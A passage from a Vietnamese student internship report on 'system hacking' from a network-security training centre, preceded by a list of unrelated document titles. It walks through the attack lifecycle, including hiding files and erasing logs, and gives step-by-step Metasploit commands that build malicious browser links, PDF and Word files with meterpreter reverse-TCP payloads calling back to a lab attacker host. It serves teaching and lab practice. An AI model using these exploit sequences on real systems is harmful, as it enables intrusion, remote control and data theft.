BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
 
CHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptx
CHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptxCHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptx
CHƯƠNG VII LUẬT DÂN SỰ (2) Pháp luật đại cương.pptx
 
VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...
VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...
VẬN DỤNG KIẾN THỨC LIÊN MÔN TRONG GIẢI BÀI TẬP ÔN THI THPTQG MÔN SINH HỌC - H...
 
Linh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdfLinh kiện điện tử - Điện tử số sáng tạo VN.pdf
Linh kiện điện tử - Điện tử số sáng tạo VN.pdf
 
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXHTư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
Tư tưởng Hồ Chí Minh về độc lập dân tộc và CNXH
 
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
 
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA GIỮA HỌC KÌ + CUỐI HỌC KÌ 2 NĂ...
 
2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hard
2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hard2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hard
2第二课:汉语不太难.pptx. Chinese lesson 2: Chinese not that hard
 
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
Lập lá số tử vi trọn đời có luận giải chi tiết, chính xác n...
 
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
TỔNG HỢP 30 ĐỀ THI CHỌN HSG CÁC TRƯỜNG THPT CHUYÊN VÙNG DUYÊN HẢI & ĐỒNG BẰNG...
 
Nhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mạiNhóm 10-Xác suất và thống kê toán-đại học thương mại
Nhóm 10-Xác suất và thống kê toán-đại học thương mại
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
 
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
 
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...
ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...
ĐẢNG LÃNH ĐẠO HAI CUỘC KHÁNG CHIẾN GIÀNH ĐỘC LẬP HOÀN TOÀN, THỐNG NHẤT ĐẤT NƯ...
 

Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ

  • 1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP DOANH NGHIỆP SYSTEM HACKING Giảng viên hướng dẫn: Võ Đỗ Thắng. Sinh viên thực hiện: Dương Đình Tú. TP. Hồ Chí Minh, tháng 11 năm 2013
  • 2. Athena Center SVTH: Dương Đình Tú Trang 2 MỞ ĐẦU Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh nghiệp…Theo nhìn nhận của Bkav, đã có những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về công nghệ. Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh. Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay. Dương Đình Tú.
  • 3. Athena Center SVTH: Dương Đình Tú Trang 3 LỜI CẢM ƠN Để thực hiện và hoàn thành đề tài này, trước hết tôi xin cảm ơn đến các thầy, giảng viên hướng dẫn sinh viên thực tập tại Trung tâm đào tạo quản trị mạng và an ninh mạng quốc tế ATHENA, đã tận tình chỉ bảo trong thời gian vừa qua. Tôi cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo điều kiện cho tôi hoàn thành đề tài này. Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề tôi rút kinh nghiệm trong các công trình tìm hiểu, phát triển sau này. Sinh viên Dương Đình Tú.
  • 4. Athena Center SVTH: Dương Đình Tú Trang 4 MỤC LỤC MỞ ĐẦU.....................................................................................................................................1 LỜI CẢM ƠN ............................................................................................................................3 PHẦN 1: GIỚI THIỆU .............................................................................................................1 1.1 System Hacking và Tình hình an ninh mạng Việt Nam................................................................. 1 1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows.......................................................... 1 1.3 Quá trình tấn công vào một hệ thống............................................................................................. 2 (hình 1.1: Quá trình tấn công vào một hệ thống) ......................................................................... 2 PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN.............................................................................................................................................4 2.1 Hệ điều hành Backtrack 5 R3......................................................................................................... 4 2.2 Phần mềm Metasploit..................................................................................................................... 6 2.2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác................................................................................................................................................... 6 2.2.2 Cấu hình Module exploit đã chọn: .......................................................................................... 7 2.2.3 Verify những options vừa cấu hình:........................................................................................ 7 2.2.4 Lựa chọn target: ...................................................................................................................... 7 2.2.5 Lựa chọn payload:................................................................................................................... 7 2.2.6 Thực thi exploit:...................................................................................................................... 7 2.3 Sơ đồ tổng quan hệ thống mạng LAN............................................................................................ 8 (Hình 2.1: Sơ đồ tổng quan hệ thống mạng LAN)....................................................................... 8 2.4 Xâm nhập và khai thác Windows XP............................................................................................. 9 2.4.1 Lỗ hổng sử dụng: Ms12_004................................................................................................... 9 (hình 2.2: Lỗ hổng sử dụng: Ms12_004).................................................................................... 10 (hình 2.3: Lỗ hổng sử dụng: Ms12_004).................................................................................... 10 2.4.2 Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2........................................................ 12 (hình 2.5: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)........................................... 12 (hình 2.6: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)........................................... 13 (hình 2.7: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)........................................... 14 2.4.3 Lỗ hổng sử dụng: file WORD phiên bản word 2007 ............................................................ 14
  • 5. Athena Center SVTH: Dương Đình Tú Trang 5 (hình 2.8: Lỗ hổng sử dụng: file WORD phiên bản word 2007) ............................................... 15 (hình 2.9: Lỗ hổng sử dụng: file WORD phiên bản word 2007) ............................................... 16 (hình 2.10: Lỗ hổng sử dụng: file WORD phiên bản word 2007).............................................. 16 PHẦN 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET.......................................................................................................17 3.1 Honeypot ..................................................................................................................................... 17 3.2 Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet........................................... 17 (hình 3.1: sơ đồ tổng quan sử dụng Honepot)............................................................................ 17 (hình 3.2: Công cụ metasploit) ................................................................................................... 18 3.3 Tấn công hệ điều hành Windows XP .......................................................................................... 19 3.3.1 Xâm nhập và khai thác hệ thống.......................................................................................... 19 (hình3.3: Ping đến trang google.com)........................................................................................ 19 (hình3.4 gửi Trojan về máy mục tiêu)- Bây giờta có thể tiến hành khai thác tại máy mục tiêu:20 (Hình 3.5: Khai thác thông tin từmáy mục tiêu) ........................................................................ 21 PHẦN 4: TỔNG KẾT .............................................................................................................22 DANH MỤC TÀI LIỆU THAM KHẢO ...............................................................................23
  • 6. Athena Center SVTH: Dương Đình Tú Trang 1 PHẦN 1: GIỚI THIỆU 1.1 System Hacking và Tình hình an ninh mạng Việt Nam System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức. 1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để khởi động chương trình của họ một cách tự động trên máy tính của bạn. Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người. Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft. Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc
  • 7. Athena Center SVTH: Dương Đình Tú Trang 2 hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng. Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH Windows, Internet Explorer, Windows Server, Microsoft Exchange và .NetFramework. 1.3 Quá trình tấn công vào một hệ thống Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau: (hình 1.1: Quá trình tấn công vào một hệ thống) Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính xác hơn.
  • 8. Athena Center SVTH: Dương Đình Tú Trang 3 Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống. Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công. Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công. Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt. Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao. Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin. Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy chương trình trojan, keylogger…
  • 9. Athena Center SVTH: Dương Đình Tú Trang 4 PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN 2.1 Hệ điều hành Backtrack 5 R3 Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor. Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được phân loại như sau: Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning. Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).
  • 10. Athena Center SVTH: Dương Đình Tú Trang 5 Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web. Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này. Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất. Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này. Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/
  • 11. Athena Center SVTH: Dương Đình Tú Trang 6 2.2 Phần mềm Metasploit Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta có thể download chương trình tại www.metasploit.com. Metasploit hỗ trợ nhiều giao diện với người dùng: Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn. Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện Web. Command line interface: dùng msfcli. Metasploit Enviroment: Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits. Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện. Sử dụng Metasploit Framework: 2.2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác Show exploits: xem các module exploit mà framework có hỗ trợ.
  • 12. Athena Center SVTH: Dương Đình Tú Trang 7 Use exploit_name: chọn module exploit. Info exploit_name: xem thông tin về module exploit. Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên www.metasploit.com hoặc qua lệnh msfupdate hoặc svnupdat/opt/metasploit/msf3/. 2.2.2 Cấu hình Module exploit đã chọn: show options: Xác định những options nào cần cấu hình. set: cấu hình cho những option của module đó. Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds. 2.2.3 Verify những options vừa cấu hình: check: kiểm tra xem những option đã được set chính xác chưa. 2.2.4 Lựa chọn target: show targets: những target được cung cấp bởi module đó. set: xác định target nào. 2.2.5 Lựa chọn payload: show payloads: liệt kê ra những payload của module exploit hiện tại. info payload_name: xem thông tin chi tiết về payload đó. set payload payload_name: xác định payload module name. Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó. show advanced: xem những advanced options của payload đó. 2.2.6 Thực thi exploit: exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác.
  • 13. Athena Center SVTH: Dương Đình Tú Trang 8 2.3 Sơ đồ tổng quan hệ thống mạng LAN (Hình 2.1: Sơ đồ tổng quan hệ thống mạng LAN) Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong mạng. Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OSX.
  • 14. Athena Center SVTH: Dương Đình Tú Trang 9 Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ http://www.nessus.org/. Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/ backdoor, … 2.4 Xâm nhập và khai thác Windows XP 2.4.1Lỗ hổng sử dụng: Ms12_004 Khởi động msfconsole tử cửa sổ terminal của BackTrack Khai báo lỗ hổng sử dụng và thiết đặt options: o Search ms12_004 o use exploit/windows/browser/ms12_004_midi o show options o set SRVHOST 192.168.159.128 o set PAYLOAD windows/meterpreter/reverse_tcp o set LHOST 192.168.159.128 o exploit
  • 15. Athena Center SVTH: Dương Đình Tú Trang 10 (hình 2.2: Lỗ hổng sử dụng: Ms12_004) BackTrack sẽ tạo ra một link chứa mã độc (http://192.168.159.128:4444). Chỉ cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó. (hình 2.3: Lỗ hổng sử dụng: Ms12_004)
  • 16. Athena Center SVTH: Dương Đình Tú Trang 11 Tiến hành khai thác máy nạn nhân có IP: 192.168.159.129 port 1078. sessions sessions –i 1 getuid sysinfo (hình 2.4: Lỗ hổng sử dụng: Ms12_004) Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2 Nạn nhân: Computer: HUUANHH-9091FB1 Os: Windows XP (Build 2600. Service Pack 2). Architecture: x86. Systemlanguage: en US. Meterpreter: x86/win32
  • 17. Athena Center SVTH: Dương Đình Tú Trang 12 2.4.2Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2 Khởi động msfconsole tử cửa sổ terminal của BackTrack. Khai báo lỗ hổng sử dụng và thiết đặt options: o Search nojs o use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs o show options o set FILENAME test.pdf (đây là tên do mình tự đặt với cú pháp *.pdf) o set PAYLOAD windows/meterpreter/reverse_tcp o set LHOST 192.168.159.128 o set LPORT 4444 o exploit (hình 2.5: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2) - Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file pdf có chứa mã độc, file sẽ được lưu tại root./msf4/test.pdf - Tiếp tục thực hiện các bước sau:
  • 18. Athena Center SVTH: Dương Đình Tú Trang 13 Use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.159.128 exploit (hình 2.6: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)
  • 19. Athena Center SVTH: Dương Đình Tú Trang 14 - Tới đây chúng ta bắt đầu gửi file pdf vừa tạo cho máy nạn nhân, khi nạn nhân mở file backtrack sẽ gửi mã độc và chiếm được quyền sử dụng máy nạn nhân. (hình 2.7: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2) - Tới đây chúng ta đã chiếm được quyền sử dụng của máy nạn nhân. 2.4.3Lỗ hổng sử dụng: file WORD phiên bản word 2007 Khởi động msfconsole tử cửa sổ terminal của BackTrack. Khai báo lỗ hổng sử dụng và thiết đặt options: o Search ms12_027 o use exploit/windows/fileformat/ms12_027_mscomctl_bof o show options o set FILENAME test.doc (đây là tên do mình tự đặt với cú pháp *.pdf) o set PAYLOAD windows/meterpreter/reverse_tcp o set LHOST 192.168.159.128 o exploit
  • 20. Athena Center SVTH: Dương Đình Tú Trang 15 (hình 2.8: Lỗ hổng sử dụng: file WORD phiên bản word 2007) - Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa mã độc, file sẽ được lưu tại root./msf4/test.doc - Tiếp tục thực hiện các bước sau: Use exploit/multi/handler Set payload /windows/meterpreter/reverse_tcp Set lhost 192.168.158.128 Exploit
